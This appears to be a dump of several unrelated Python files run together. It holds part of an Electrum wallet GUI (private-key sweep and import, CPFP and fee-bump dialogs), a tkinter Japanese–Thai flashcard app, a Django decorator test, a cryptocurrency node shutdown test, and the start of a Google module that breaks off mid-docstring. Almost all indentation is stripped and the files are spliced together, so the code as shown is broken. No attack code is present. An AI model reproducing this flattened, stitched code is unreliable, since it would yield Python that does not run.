button.setToolTip('')
button.setEnabled(get_address() is not None and valid_privkeys)
on_address = lambda text: address_e.setStyleSheet((ColorScheme.DEFAULT if get_address() else ColorScheme.RED).as_stylesheet())
keys_e.textChanged.connect(on_edit)
address_e.textChanged.connect(on_edit)
address_e.textChanged.connect(on_address)
on_address(str(address_e.text()))
if not d.exec_():
return
# user pressed "sweep"
addr = get_address()
try:
self.wallet.check_address(addr)
except InternalAddressCorruption as e:
self.show_error(str(e))
raise
try:
coins, keypairs = sweep_preparations(get_pk(), self.network)
except Exception as e: # FIXME too broad...
self.show_message(repr(e))
return
self.do_clear()
self.tx_external_keypairs = keypairs
self.spend_coins(coins)
self.payto_e.setText(addr)
self.spend_max()
self.payto_e.setFrozen(True)
self.amount_e.setFrozen(True)
self.warn_if_watching_only()
def _do_import(self, title, header_layout, func):
text = text_dialog(self, title, header_layout, _('Import'), allow_multi=True)
if not text:
return
keys = str(text).split()
good_inputs, bad_inputs = func(keys)
if good_inputs:
msg = '\n'.join(good_inputs[:10])
if len(good_inputs) > 10: msg += '\n...'
self.show_message(_("The following addresses were added")
+ f' ({len(good_inputs)}):\n' + msg)
if bad_inputs:
msg = "\n".join(f"{key[:10]}... ({msg})" for key, msg in bad_inputs[:10])
if len(bad_inputs) > 10: msg += '\n...'
self.show_error(_("The following inputs could not be imported")
+ f' ({len(bad_inputs)}):\n' + msg)
self.address_list.update()
self.history_list.update()
def import_addresses(self):
if not self.wallet.can_import_address():
return
title, msg = _('Import addresses'), _("Enter addresses")+':'
self._do_import(title, msg, self.wallet.import_addresses)
@protected
def do_import_privkey(self, password):
if not self.wallet.can_import_privkey():
return
title = _('Import private keys')
header_layout = QHBoxLayout()
header_layout.addWidget(QLabel(_("Enter private keys")+':'))
header_layout.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
self._do_import(title, header_layout, lambda x: self.wallet.import_private_keys(x, password))
def update_fiat(self):
b = self.fx and self.fx.is_enabled()
self.fiat_send_e.setVisible(b)
self.fiat_receive_e.setVisible(b)
self.history_list.update()
self.address_list.refresh_headers()
self.address_list.update()
self.update_status()
def settings_dialog(self):
from .settings_dialog import SettingsDialog
d = SettingsDialog(self, self.config)
self.alias_received_signal.connect(d.set_alias_color)
d.exec_()
self.alias_received_signal.disconnect(d.set_alias_color)
if self.fx:
self.fx.trigger_update()
run_hook('close_settings_dialog')
if d.need_restart:
self.show_warning(_('Please restart Electrum to activate the new GUI settings'), title=_('Success'))
def closeEvent(self, event):
# It seems in some rare cases this closeEvent() is called twice
if not self.cleaned_up:
self.cleaned_up = True
self.clean_up()
event.accept()
def clean_up(self):
self.wallet.thread.stop()
if self.network:
self.network.unregister_callback(self.on_network)
self.config.set_key("is_maximized", self.isMaximized())
if not self.isMaximized():
g = self.geometry()
self.wallet.storage.put("winpos-qt", [g.left(),g.top(),
g.width(),g.height()])
self.wallet.storage.put("qt-console-history", self.console.history[-50:])
if self.qr_window:
self.qr_window.close()
self.close_wallet()
self.gui_object.timer.timeout.disconnect(self.timer_actions)
self.gui_object.close_window(self)
def plugins_dialog(self):
self.pluginsdialog = d = WindowModalDialog(self, _('Electrum Plugins'))
plugins = self.gui_object.plugins
vbox = QVBoxLayout(d)
# plugins
scroll = QScrollArea()
scroll.setEnabled(True)
scroll.setWidgetResizable(True)
scroll.setMinimumSize(400,250)
vbox.addWidget(scroll)
w = QWidget()
scroll.setWidget(w)
w.setMinimumHeight(plugins.count() * 35)
grid = QGridLayout()
grid.setColumnStretch(0,1)
w.setLayout(grid)
settings_widgets = {}
def enable_settings_widget(p, name, i):
widget = settings_widgets.get(name)
if not widget and p and p.requires_settings():
widget = settings_widgets[name] = p.settings_widget(d)
grid.addWidget(widget, i, 1)
if widget:
widget.setEnabled(bool(p and p.is_enabled()))
def do_toggle(cb, name, i):
p = plugins.toggle(name)
cb.setChecked(bool(p))
enable_settings_widget(p, name, i)
run_hook('init_qt', self.gui_object)
for i, descr in enumerate(plugins.descriptions.values()):
full_name = descr['__name__']
prefix, _separator, name = full_name.rpartition('.')
p = plugins.get(name)
if descr.get('registers_keystore'):
continue
try:
cb = QCheckBox(descr['fullname'])
plugin_is_loaded = p is not None
cb_enabled = (not plugin_is_loaded and plugins.is_available(name, self.wallet)
or plugin_is_loaded and p.can_user_disable())
cb.setEnabled(cb_enabled)
cb.setChecked(plugin_is_loaded and p.is_enabled())
grid.addWidget(cb, i, 0)
enable_settings_widget(p, name, i)
cb.clicked.connect(partial(do_toggle, cb, name, i))
msg = descr['description']
if descr.get('requires'):
msg += '\n\n' + _('Requires') + ':\n' + '\n'.join(map(lambda x: x[1], descr.get('requires')))
grid.addWidget(HelpButton(msg), i, 2)
except Exception:
self.logger.exception(f"cannot display plugin {name}")
grid.setRowStretch(len(plugins.descriptions.values()), 1)
vbox.addLayout(Buttons(CloseButton(d)))
d.exec_()
def cpfp(self, parent_tx: Transaction, new_tx: Transaction) -> None:
total_size = parent_tx.estimated_size() + new_tx.estimated_size()
parent_txid = parent_tx.txid()
assert parent_txid
parent_fee = self.wallet.get_tx_fee(parent_txid)
if parent_fee is None:
self.show_error(_("Can't CPFP: unknown fee for parent transaction."))
return
d = WindowModalDialog(self, _('Child Pays for Parent'))
vbox = QVBoxLayout(d)
msg = (
"A CPFP is a transaction that sends an unconfirmed output back to "
"yourself, with a high fee. The goal is to have miners confirm "
"the parent transaction in order to get the fee attached to the "
"child transaction.")
vbox.addWidget(WWLabel(_(msg)))
msg2 = ("The proposed fee is computed using your "
"fee/kB settings, applied to the total size of both child and "
"parent transactions. After you broadcast a CPFP transaction, "
"it is normal to see a new unconfirmed transaction in your history.")
vbox.addWidget(WWLabel(_(msg2)))
grid = QGridLayout()
grid.addWidget(QLabel(_('Total size') + ':'), 0, 0)
grid.addWidget(QLabel('%d bytes'% total_size), 0, 1)
max_fee = new_tx.output_value()
grid.addWidget(QLabel(_('Input amount') + ':'), 1, 0)
grid.addWidget(QLabel(self.format_amount(max_fee) + ' ' + self.base_unit()), 1, 1)
output_amount = QLabel('')
grid.addWidget(QLabel(_('Output amount') + ':'), 2, 0)
grid.addWidget(output_amount, 2, 1)
fee_e = BTCAmountEdit(self.get_decimal_point)
# FIXME with dyn fees, without estimates, there are all kinds of crashes here
combined_fee = QLabel('')
combined_feerate = QLabel('')
def on_fee_edit(x):
out_amt = max_fee - fee_e.get_amount()
out_amt_str = (self.format_amount(out_amt) + ' ' + self.base_unit()) if out_amt else ''
output_amount.setText(out_amt_str)
comb_fee = parent_fee + fee_e.get_amount()
comb_fee_str = (self.format_amount(comb_fee) + ' ' + self.base_unit()) if comb_fee else ''
combined_fee.setText(comb_fee_str)
comb_feerate = comb_fee / total_size * 1000
comb_feerate_str = self.format_fee_rate(comb_feerate) if comb_feerate else ''
combined_feerate.setText(comb_feerate_str)
fee_e.textChanged.connect(on_fee_edit)
def get_child_fee_from_total_feerate(fee_per_kb):
fee = fee_per_kb * total_size / 1000 - parent_fee
fee = min(max_fee, fee)
fee = max(total_size, fee) # pay at least 1 sat/byte for combined size
return fee
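        # Worked example of the helper above (illustrative numbers, not taken from the
        # codebase): with total_size = 300 bytes, parent_fee = 150 sat and a target
        # combined rate of 10000 sat/kB, the child fee is 10000 * 300 / 1000 - 150 = 2850 sat,
        # then limited to at most max_fee and at least total_size (1 sat/byte over the combined size).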
suggested_feerate = self.config.fee_per_kb()
if suggested_feerate is None:
            self.show_error(f'''{_("Can't CPFP")}: {_('Dynamic fee estimates not available')}''')
return
fee = get_child_fee_from_total_feerate(suggested_feerate)
fee_e.setAmount(fee)
grid.addWidget(QLabel(_('Fee for child') + ':'), 3, 0)
grid.addWidget(fee_e, 3, 1)
def on_rate(dyn, pos, fee_rate):
fee = get_child_fee_from_total_feerate(fee_rate)
fee_e.setAmount(fee)
fee_slider = FeeSlider(self, self.config, on_rate)
fee_slider.update()
grid.addWidget(fee_slider, 4, 1)
grid.addWidget(QLabel(_('Total fee') + ':'), 5, 0)
grid.addWidget(combined_fee, 5, 1)
grid.addWidget(QLabel(_('Total feerate') + ':'), 6, 0)
grid.addWidget(combined_feerate, 6, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
fee = fee_e.get_amount()
if fee > max_fee:
self.show_error(_('Max fee exceeded'))
return
new_tx = self.wallet.cpfp(parent_tx, fee)
new_tx.set_rbf(True)
self.show_transaction(new_tx)
def bump_fee_dialog(self, tx: Transaction):
txid = tx.txid()
assert txid
fee = self.wallet.get_tx_fee(txid)
if fee is None:
self.show_error(_("Can't bump fee: unknown fee for original transaction."))
return
tx_label = self.wallet.get_label(txid)
tx_size = tx.estimated_size()
old_fee_rate = fee / tx_size # sat/vbyte
d = WindowModalDialog(self, _('Bump Fee'))
vbox = QVBoxLayout(d)
vbox.addWidget(WWLabel(_("Increase your transaction's fee to improve its position in mempool.")))
vbox.addWidget(QLabel(_('Current Fee') + ': %s'% self.format_amount(fee) + ' ' + self.base_unit()))
vbox.addWidget(QLabel(_('Current Fee rate') + ': %s' % self.format_fee_rate(1000 * old_fee_rate)))
vbox.addWidget(QLabel(_('New Fee rate') + ':'))
def on_textedit_rate():
fee_slider.deactivate()
feerate_e = FeerateEdit(lambda: 0)
feerate_e.setAmount(max(old_fee_rate * 1.5, old_fee_rate + 1))
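        # e.g. an original rate of 2 sat/vbyte gives an initial suggestion of
        # max(2 * 1.5, 2 + 1) = 3 sat/vbyte (illustrative numbers).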
feerate_e.textEdited.connect(on_textedit_rate)
vbox.addWidget(feerate_e)
def on_slider_rate(dyn, pos, fee_rate):
fee_slider.activate()
if fee_rate is not None:
feerate_e.setAmount(fee_rate / 1000)
fee_slider = FeeSlider(self, self.config, on_slider_rate)
fee_slider.deactivate()
vbox.addWidget(fee_slider)
cb = QCheckBox(_('Final'))
vbox.addWidget(cb)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
is_final = cb.isChecked()
new_fee_rate = feerate_e.get_amount()
try:
new_tx = self.wallet.bump_fee(tx=tx, new_fee_rate=new_fee_rate)
except CannotBumpFee as e:
self.show_error(str(e))
return
if is_final:
new_tx.set_rbf(False)
self.show_transaction(new_tx, tx_label)
def save_transaction_into_wallet(self, tx):
win = self.top_level_window()
try:
if not self.wallet.add_transaction(tx.txid(), tx):
win.show_error(_("Transaction could not be saved.") + "\n" +
_("It conflicts with current history."))
return False
except AddTransactionException as e:
win.show_error(e)
return False
else:
self.wallet.storage.write()
# need to update at least: history_list, utxo_list, address_list
self.need_update.set()
msg = (_("Transaction added to wallet history.") + '\n\n' +
_("Note: this is an offline transaction, if you want the network "
"to see it, you need to broadcast it."))
win.msg_box(QPixmap(icon_path("offline_tx.png")), None, _('Success'), msg)
return True
|
YiPun.py
|
from tkinter import *
from tkinter import ttk
from tkinter.ttk import Notebook
from tkinter import messagebox
import random
from googletrans import Translator
import os
from gtts import gTTS
from playsound import playsound
import csv
from threading import Thread
###############
'''
L = ["pip install gtts \n",
"pip install playsound \n",
"pip install googletrans\n",
"https://www.lfd.uci.edu/~gohlke/pythonlibs/#pyaudio \n",
"flashcard.ico \n",
"tab_flashcard.png \n",
"tab_vocab.png \n",
"translate.png \n",]
'''
deletemp3 = True
allfolder = os.listdir()
#############WRITE CSV IF NOT IN CURRENT FOLDER #############
def writevocab():
data = [['こんにちは','สวัสดีตอนกลางวัน'],
['こんばんは','สวัสดีตอนเย็น']]
with open('vocab.csv','w',newline='',encoding='utf-8') as f:
fw = csv.writer(f)
fw.writerows(data)
if 'vocab.csv' not in allfolder:
writevocab()
############# READ VOCAB.CSV FUNCTION #############
def readvocab():
with open('vocab.csv',newline='',encoding='utf-8') as f:
fr = csv.reader(f)
conf = list(fr)
print(conf)
return conf
############# DELETE MP3 IF IN FOLDER #############
if deletemp3:
for f in allfolder:
if f[-3:] == 'mp3':
os.remove(f)
randomnum = list(range(65, 91)) # ASCII codes for uppercase letters A-Z, used for random mp3 filenames
global playagain
playagain = True
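# playagain controls mp3 caching: a fresh gTTS file (with a random name from
# generatename()) is only produced while playagain is True, i.e. after a new word
# or translation is shown; older files are deleted so at most one cached mp3 remains.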
def generatename():
nm = ''
for i in range(15):
rd = chr(random.choice(randomnum))
nm += rd
nm += '.mp3'
return nm
allfilename = []
################# READ VOCAB ##################
connection = False
global allvocab
allvocab = readvocab() #read vocab from vocab.csv inside current folder
allvocabdict = {}
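# UpdateVocab re-reads vocab.csv, clears the Treeview, and inserts the entries
# that are not yet tracked in allvocabdict.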
def UpdateVocab():
global allvocab
v_statusbar.set('Updating Vocab...')
vocablist.delete(*vocablist.get_children())
print('Updating Vocab...')
allvocab = readvocab()
vclist = []
for vc in allvocab:
if vc[0] not in allvocabdict:
allvocabdict[vc[0]] = vc[1]
vclist.append(vc)
for v in vclist:
vocablist.insert('','end',value=v)
#################GOOGLE SHEET##################
GUI = Tk()
GUI.title('YiPun by Uncle Engineer v.0.0.1')
GUI.geometry('1100x600+0+0')
GUI.state('zoomed')
try:
GUI.iconbitmap('flashcard.ico')
except:
pass
menubar = Menu(GUI)
GUI.config(menu=menubar)
filemenu = Menu(menubar,tearoff=0)
# filemenu.add_command(label='Close', command=GUI.quit)
menubar.add_cascade(label='File',menu=filemenu)
filemenu.add_command(label='Exit',command=lambda: GUI.withdraw())
vocabmenu = Menu(menubar,tearoff=0)
#vocabmenu.add_command(label='Update Vocab',command=UpdateVocab)
vocabmenu.add_command(label='Add Vocab',command=lambda x=None: (Tab.select(F3),E1.focus()))
menubar.add_cascade(label='Vocab',menu=vocabmenu)
import webbrowser
def ContactUs():
url = 'http://uncle-engineer.com'
webbrowser.open(url)
def UncleEngineer():
url = 'https://www.facebook.com/UncleEngineer'
webbrowser.open(url)
def Documentation():
url = 'https://github.com/UncleEngineer/YiPun'
webbrowser.open(url)
helpmenu = Menu(menubar,tearoff=0)
helpmenu.add_command(label='Contact Us',command=ContactUs)
helpmenu.add_command(label='Donate',command=lambda: messagebox.showinfo('Donate','Paypal: [email protected]\nName: Uncle Engineer'))
helpmenu.add_command(label='Uncle Engineer',command=UncleEngineer)
helpmenu.add_command(label='Documentation',command=Documentation)
menubar.add_cascade(label='Help',menu=helpmenu)
Font = ('TH Sarabun',16)
TKFont = ttk.Style()
TKFont.configure('TButton', font=('TH Sarabun', 12))
Tab = Notebook(GUI)
F1 = Frame(Tab)
F2 = Frame(Tab)
F3 = Frame(Tab)
Tab.pack(fill=BOTH, expand=1)
try:
flashcard = PhotoImage(file='tab_flashcard.png')
vocab = PhotoImage(file='tab_vocab.png')
transicon = PhotoImage(file='translate.png')
Tab.add(F1, text='Flashcard', image=flashcard,compound='top')
Tab.add(F2, text='All vocab', image=vocab,compound='top')
Tab.add(F3, text='Translate', image=transicon,compound='top')
except:
Tab.add(F1, text='Flashcard')
Tab.add(F2, text='All vocab')
Tab.add(F3, text='Translate')
global current_vocab
current_vocab = None
global checked
checked = False
def RandomFlashcard(event=None):
v_check.set('')
global checked
checked =False
vc = random.choice(allvocab)
global current_vocab
current_vocab = vc
print(vc)
v_vocab.set(vc[0])
v_trans.set('')
global playagain
playagain = True
def ShowTranslate(event=None):
v_trans.set(current_vocab[1])
def CheckTranslate(event=None):
global checked
print([v_check.get()],[current_vocab[1]])
if v_check.get() == current_vocab[1].replace(' ','') and checked != True:
v_score.set(int(v_score.get()) + 1)
checked = True
#RandomFlashcard() #uncomment this if autonextword
v_trans.set(current_vocab[1])
##########################
def SpeakNow(event=None):
print(allfilename)
print(v_vocab.get())
global playagain
tts = gTTS(text=v_vocab.get(), lang='ja')
if playagain == True:
name = generatename()
allfilename.append(name)
tts.save(name)
playagain = False
if len(allfilename) > 1:
os.remove(allfilename[0])
del allfilename[0]
playsound(allfilename[0])
def SpeakNow2(event=None):
#v_translatenow.get()
global playagain
if v_radio.get() == 'ja':
tts = gTTS(text=v_transvocab.get(), lang='ja')
elif v_radio.get() == 'th':
tts = gTTS(text=v_transvocab.get(), lang='th')
else:
tts = gTTS(text=v_transvocab.get(), lang='en')
if playagain == True:
name = generatename()
allfilename.append(name)
tts.save(name)
playagain = False
if len(allfilename) > 1:
os.remove(allfilename[0])
del allfilename[0]
playsound(allfilename[0])
GUI.bind('<F4>',SpeakNow2)
def SpeakNow3(vocab_sound):
#v_translatenow.get()
global playagain
tts = gTTS(text=vocab_sound, lang='ja')
if playagain == True:
name = generatename()
allfilename.append(name)
tts.save(name)
playagain = True
if len(allfilename) > 1:
os.remove(allfilename[0])
del allfilename[0]
playsound(allfilename[0])
##########################
FB0 = Frame(F1)
FB0.place(x=100,y=200)
check_label = ttk.Label(FB0,text='ตรวจความหมาย',font=('Angsana New',20))
check_label.grid(row=0,column=0)
v_check = StringVar()
check_vocab = ttk.Entry(FB0,textvariable=v_check,font=('Angsana New',20),width=50)
check_vocab.grid(row=0,column=1,padx=20,pady=20)
check_vocab.focus()
#### BIND #####
check_vocab.bind('<Return>',CheckTranslate)
GUI.bind('<F1>',RandomFlashcard)
GUI.bind('<F2>',ShowTranslate)
FB1 = Frame(F1)
FB1.place(x=100,y=300)
nextvocab = ttk.Button(FB1,text='คำศัพท์ถัดไป',command=RandomFlashcard)
nextvocab.grid(row=1,column=1,padx=20,ipadx=20,ipady=10)
nextvocab = ttk.Button(FB1,text='โชว์คำแปล',command=ShowTranslate)
nextvocab.grid(row=1,column=2,padx=20,ipadx=20,ipady=10)
checkvocab = ttk.Button(FB1,text='เช็คคำแปล',command=CheckTranslate)
checkvocab.grid(row=1,column=3,padx=20,ipadx=20,ipady=10)
speak = ttk.Button(FB1,text='อ่านออกเสียง',command=SpeakNow)
speak.grid(row=1,column=4,padx=20,ipadx=20,ipady=10)
GUI.bind('<F3>',SpeakNow)
#######LABEL VOCAB########
#FB2 = Frame(F1)
#FB2.place(x=100,y=50)
v_vocab = StringVar()
v_trans = StringVar()
show_vocab = ttk.Label(F1, textvariable=v_vocab,font=('Angsana New',50,'bold'))
show_vocab.place(x=100,y=20)
show_translate = ttk.Label(F1, textvariable=v_trans,font=('Angsana New',30,'bold'),foreground='green')
show_translate.place(x=100,y=100)
v_score = StringVar()
v_score.set('0')
score_label =ttk.Label(F1,text='คะแนน',font=('Angsana New',30))
score_label.place(x=50,y=400)
score = ttk.Label(F1, textvariable=v_score,font=('Angsana New',30,'bold'),foreground='red')
score.place(x=150,y=400)
def SoundTreeview(event=None):
global playagain
try:
select = vocablist.selection()
data = vocablist.item(select)
print(data)
vocabsound = data['values'][0]
SpeakNow3(vocabsound)
        playagain = False
except:
messagebox.showinfo('Please Select Row','กรุณาเลือกคำศัพท์ก่อน')
############## TAB2 #############
def ReplaceVocab(event=None):
data = []
for k,v in allvocabdict.items():
dt = [k,v]
print(dt)
data.append(dt)
with open('vocab.csv','w',newline='',encoding='utf-8') as f:
fw = csv.writer(f)
fw.writerows(data)
UpdateVocab()
CountVocab()
def UpdateMeaningVocab(vocab,trans):
global allvocabdict
allvocabdict[vocab] = trans
ReplaceVocab()
UpdateVocab()
CountVocab()
GUI.bind('<F12>',ReplaceVocab)
def DeleteVocab(event=None):
try:
select = vocablist.selection()
print('SELECT ID', select)
if len(select) == 1:
data = vocablist.item(select)
selectvocab = data['values'][0]
print('Deleting..',selectvocab)
del allvocabdict[selectvocab]
ReplaceVocab()
else:
for sl in select:
data = vocablist.item(sl)
selectvocab = data['values'][0]
print('Deleting..',selectvocab)
del allvocabdict[selectvocab]
ReplaceVocab()
            selectvocab = data['values'][0] # trap errors (triggers the except when nothing is selected)
except:
print('ERROR')
def UpdateVocabUI(event=None):
try:
select = vocablist.selection()
print('SELECT ID', select)
data = vocablist.item(select)
v1 = data['values'][0]
v2 = data['values'][1]
def SaveVocab(event=None):
nv1 = v_updatevocab.get()
nv2 = v_updatevocab2.get()
UpdateMeaningVocab(nv1,nv2)
print(f'Updated: {nv1} to {nv2}')
GUI2.withdraw()
GUI2 = Toplevel()
GUI2.geometry('400x250+0+0')
GUI2.title('Update Meaning')
v_updatevocab = StringVar()
v_updatevocab.set(v1)
v_updatevocab2 = StringVar()
v_updatevocab2.set(v2)
EM1 = ttk.Entry(GUI2,textvariable=v_updatevocab,font=(None,20,'bold'))
EM1.pack(pady=10)
EM2 = ttk.Entry(GUI2,textvariable=v_updatevocab2,font=(None,20))
EM2.pack(pady=10)
EM2.bind('<Return>',SaveVocab)
EM2.focus()
BS = ttk.Button(GUI2,text='Save',command=SaveVocab)
BS.pack(ipadx=20,ipady=20)
GUI2.bind('<Escape>',lambda x: GUI2.withdraw())
GUI2.mainloop()
except:
messagebox.showwarning('Please Select Vocab','กรุณาเลือกคำศัพท์ที่ต้องการแก้ไขก่อน')
v_countvocab = StringVar()
L1 = ttk.Label(F2,text='คำศัพท์ทั้งหมด:',font=('Angsana New',20)).place(x=50,y=30)
L1 = ttk.Label(F2,textvariable=v_countvocab,font=('Angsana New',20)).place(x=200,y=30)
L2 = ttk.Label(F2,text='ดับเบิลคลิกเพื่อฟังเสียง',font=('Angsana New',15)).place(x=50,y=600)
header = ['Vocab','Translation']
vocablist = ttk.Treeview(F2, columns=header, show='headings',height=10)
vocablist.place(x=20,y=80)
###############
def RunSoundTreeview(event=None):
v_statusbar.set('Play Sound...')
task = Thread(target=SoundTreeview)
task.start()
vocablist.bind('<Double-1>', RunSoundTreeview)
vocablist.bind('<Delete>',DeleteVocab)
vocablist.bind('<F11>',UpdateVocabUI)
#### Right Click Menu ####
deletemenu = Menu(GUI,tearoff=0)
deletemenu.add_command(label='Delete Vocab',command=DeleteVocab)
deletemenu.add_command(label='Change Meaning',command=UpdateVocabUI)
def popup(event):
deletemenu.post(event.x_root,event.y_root)
vocablist.bind('<Button-3>',popup)
for hd in header:
#tree.column("#0",minwidth=0,width=100, stretch=NO)
vocablist.heading(hd,text=hd)
headerwidth = [(100,600),(100,400)]
for hd,W in zip(header,headerwidth):
vocablist.column(hd,minwidth=W[0],width=W[1])
# for vc in allvocab:
# if vc[0] not in allvocabdict:
# vocablist.insert('','end',value=vc)
# allvocabdict[vc[0]] = vc[1]
style = ttk.Style()
style.configure("Treeview.Heading", font=('Angsana New', 30))
style.configure("Treeview", font=('Angsana New', 20),rowheight=40)
scrolling = ttk.Scrollbar(F2, orient="vertical", command=vocablist.yview)
scrolling.pack(side='right',fill='y')
vocablist.configure(yscrollcommand=scrolling.set)
##############################
def add_vocab(list_data):
with open('vocab.csv','a',newline='',encoding='utf-8') as f:
fw = csv.writer(f)
fw.writerow(list_data)
Lam = Translator()
v_jisho = StringVar()
def TranslateNow(event=None):
print(v_radio.get(), v_texttras.get())
    EB2.config(state='normal') # re-enable the read-aloud button
trans = Lam.translate(v_texttras.get(),dest=v_radio.get())
v_jisho.set(trans.text)
alltext = ''
alltext += trans.text
if trans.pronunciation != None and v_radio.get() == 'ja':
alltext += '\nคำอ่าน: ' + trans.pronunciation
v_translatenow.set(alltext)
v_transvocab.set(trans.text)
if savetosheet.get() == 1:
try:
if v_radio2.get() == 'google':
texttrans = trans.text
else:
texttrans = v_manualtrans.get()
if v_radio.get() == 'th' or v_radio.get() == 'en':
if v_texttras.get() not in allvocabdict:
add_vocab([v_texttras.get(),texttrans])
else:
if v_texttras.get() not in allvocabdict:
add_vocab([texttrans,v_texttras.get()])
v_statusbar.set('บันทึกคำศัพท์ลงฐานข้อมูลสำเร็จ')
UpdateVocab()
CountVocab()
except:
print('Can not save')
global playagain
playagain = True
L1 = ttk.Label(F3, text = 'กรุณาพิมพ์คำศัพท์/ประโยคที่ต้องการแปล',font=('Angsana New',20))
L1.pack(pady=10)
FR0 = ttk.LabelFrame(F3,text='แปลเป็นภาษา')
FR0.pack()
v_radio = StringVar()
RB1 = ttk.Radiobutton(FR0,text=' Japanese',variable=v_radio,value='ja')
RB2 = ttk.Radiobutton(FR0,text=' Thai ',variable=v_radio,value='th')
RB3 = ttk.Radiobutton(FR0,text='English ',variable=v_radio,value='en')
RB1.invoke()
RB1.grid(row=0,column=1,pady=5,padx=10)
RB2.grid(row=0,column=2,pady=5,padx=10)
RB3.grid(row=0,column=3,pady=5,padx=10)
FR1 = ttk.LabelFrame(F3,text='แปลอัตโนมัติ / ด้วยตัวเอง')
FR1.pack(pady=10)
def ShowTranslateManual(event=None):
if v_radio2.get() == 'google':
try:
LM2.grid_forget()
E2.grid_forget()
except:
pass
else:
LM2.grid(row=0,column=0)
E2.grid(row=1,column=0)
# disable the read-aloud button while new text is being typed
def disabletexttospeech(event=None):
EB2.config(state='disabled')
v_radio2 = StringVar()
RB3 = ttk.Radiobutton(FR1,text='Google Translate',variable=v_radio2,value='google',command=ShowTranslateManual)
RB4 = ttk.Radiobutton(FR1,text='Manual Translate',variable=v_radio2,value='manual',command=ShowTranslateManual)
RB3.invoke()
RB3.grid(row=0,column=3,pady=5,padx=10)
RB4.grid(row=0,column=4,pady=5,padx=10)
savetosheet = IntVar()
savetosheet.set(0)
cbtn = ttk.Checkbutton(F3,text='Save to Database',variable=savetosheet)
cbtn.pack()
# if connection == False:
# cbtn.config(state='disabled')
v_texttras = StringVar() # holds the text typed by the user
E1 = ttk.Entry(F3, textvariable = v_texttras,font=('Angsana New',20),width=70)
E1.pack(pady=10)
E1.bind('<KeyPress>', disabletexttospeech)
E1.bind('<Return>',TranslateNow)
FLM = Frame(F3)
FLM.pack()
LM2 = ttk.Label(FLM,text='Manual Translate')
LM2.grid(row=0,column=0)
v_manualtrans = StringVar() # holds the manual translation typed by the user
E2 = ttk.Entry(FLM, textvariable = v_manualtrans,font=('Angsana New',20),width=70)
E2.grid(row=1,column=0)
E2.bind('<Return>',TranslateNow)
EBF = Frame(F3)
EBF.pack(pady=20,ipadx=20,ipady=10)
EB1 = ttk.Button(EBF,text='แปล',command=TranslateNow)
EB1.grid(row=0,column=0,padx=10,ipadx=15,ipady=10)
EB2 = ttk.Button(EBF,text='อ่านออกเสียง',command=SpeakNow2, state='disabled')
EB2.grid(row=0,column=1,padx=10,ipadx=15,ipady=10)
#EB3 = ttk.Button(EBF,text='อ่านออกเสียง (ความหมายญี่ปุ่น)',command=SpeakNow3)
#EB3.grid(row=0,column=2,padx=10,ipadx=15,ipady=10)
v_transvocab =StringVar()
v_translatenow = StringVar()
v_translatenow.set('----Result----')
F31 = Frame(F3)
F31.pack(pady=20)
trans_label =ttk.Label(F31,text='คำแปล',font=('Angsana New',30))
trans_label.pack()
resulttext = ttk.Label(F31, textvariable=v_translatenow,font=('Angsana New',30,'bold'),foreground='red')
resulttext.pack()
# hide the manual translation fields initially
LM2.grid_forget()
E2.grid_forget()
def JishoWeb(event=None):
gettext = v_jisho.get()
if len(gettext) > 0:
url = 'https://jisho.org/search/'+ gettext
webbrowser.open(url)
GUI.bind('<F5>',JishoWeb)
def on_click(event):
#print('widget:', event.widget)
#print('x:', event.x)
#print('y:', event.y)
#selected = nb.identify(event.x, event.y)
    #print('selected:', selected) # it's not useful
clicked_tab = Tab.tk.call(Tab._w, "identify", "tab", event.x, event.y)
#print('clicked tab:', clicked_tab)
active_tab = Tab.index(Tab.select())
#print(' active tab:', active_tab)
if clicked_tab == 2:
E1.focus()
elif clicked_tab == 1:
RandomFlashcard()
# if clicked_tab == active_tab:
# Tab.forget(clicked_tab)
def CountVocab():
count = len(allvocabdict)
v_countvocab.set(count)
Tab.bind('<Button-1>', on_click)
##### STATUS BAR ####
v_statusbar = StringVar()
statusbar = Label(F3, textvariable=v_statusbar, bd=1, relief=SUNKEN, anchor='w')
statusbar.pack(side=BOTTOM, fill=X)
UpdateVocab()
print('CURRENT VOCAB: ',allvocabdict)
CountVocab()
# def ChangeTab(event=None):
# Tab.select(F2)
# GUI.bind('<F9>',ChangeTab)
GUI.mainloop()
|
test_decorators.py
|
from datetime import datetime
from threading import Thread
from django.test import TestCase
from drf_util.decorators import await_process_decorator, await_checker, set_await
@await_process_decorator(5, 7)
def simple_print(text):
print(datetime.now(), text)
class DecoratorsTests(TestCase):
def test_await_process_decorator(self):
result = set_await("test", 2)
self.assertEqual(result, None)
result = await_checker("test", 2)
self.assertEqual(result, None)
for i in range(5):
thread = Thread(target=simple_print, kwargs={"text": "try #%s" % i})
# thread starting
print("start thread #", i)
thread.start()
|
feature_shutdown.py
|
#!/usr/bin/env python3
# Copyright (c) 2018 The Bitcoin Core developers
# Copyright (c) 2018-2021 The CSPN Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test cspnd shutdown."""
from test_framework.test_framework import CSPNTestFramework
from test_framework.util import assert_equal, get_rpc_proxy, wait_until
from threading import Thread
def test_long_call(node):
block = node.waitfornewblock()
assert_equal(block['height'], 0)
class ShutdownTest(CSPNTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 1
def run_test(self):
node = get_rpc_proxy(self.nodes[0].url, 1, timeout=600, coveragedir=self.nodes[0].coverage_dir)
# Force connection establishment by executing a dummy command.
node.getblockcount()
Thread(target=test_long_call, args=(node,)).start()
# Wait until the server is executing the above `waitfornewblock`.
wait_until(lambda: len(self.nodes[0].getrpcinfo()['active_commands']) == 2)
# Wait 1 second after requesting shutdown but not before the `stop` call
# finishes. This is to ensure event loop waits for current connections
# to close.
self.stop_node(0, wait=1000)
if __name__ == '__main__':
ShutdownTest().main()
|
main.py
|
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Main entry module specified in app.yaml.
